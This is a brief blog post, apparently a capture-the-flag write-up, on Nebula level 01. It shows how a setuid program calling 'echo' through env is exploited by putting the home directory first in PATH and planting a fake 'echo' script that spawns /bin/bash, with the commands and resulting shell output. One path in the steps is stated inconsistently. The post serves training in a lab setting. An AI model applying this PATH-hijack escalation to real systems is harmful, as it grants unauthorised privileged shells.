Scripting Image

Exploit Exersizes Nebula Level 01

After completing Nebula level 00, I’ve finally had time to move to Level 01, and give it some thought.

In level01 you’re given a short code example, and asked to exploit it. After looking at the code for a short period, it was clear that the issue was in the line:

system("/usr/bin/env echo and now what?");

I’m not a C programmer, so I had to look up the other stuff, but when I realized that echo was not an explicit path, it was clearly simple that it was the exploit.

To exploit this I did the following:

PATH=~:$PATH

In /home/flag01 I created a script named echo, with the following content:

#!/bin/bash

/bin/bash

Make the script executable with chmod +x, then run /home/flag01/flag01:

level01@nebula:~$ chmod +x echo 
level01@nebula:~$ /home/flag01/flag01 
flag01@nebula:~$ getflag
You have successfully executed getflag on a target account

Now onto Nebula Level02 when I have some time

One thought on “Exploit Exersizes Nebula Level 01”

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>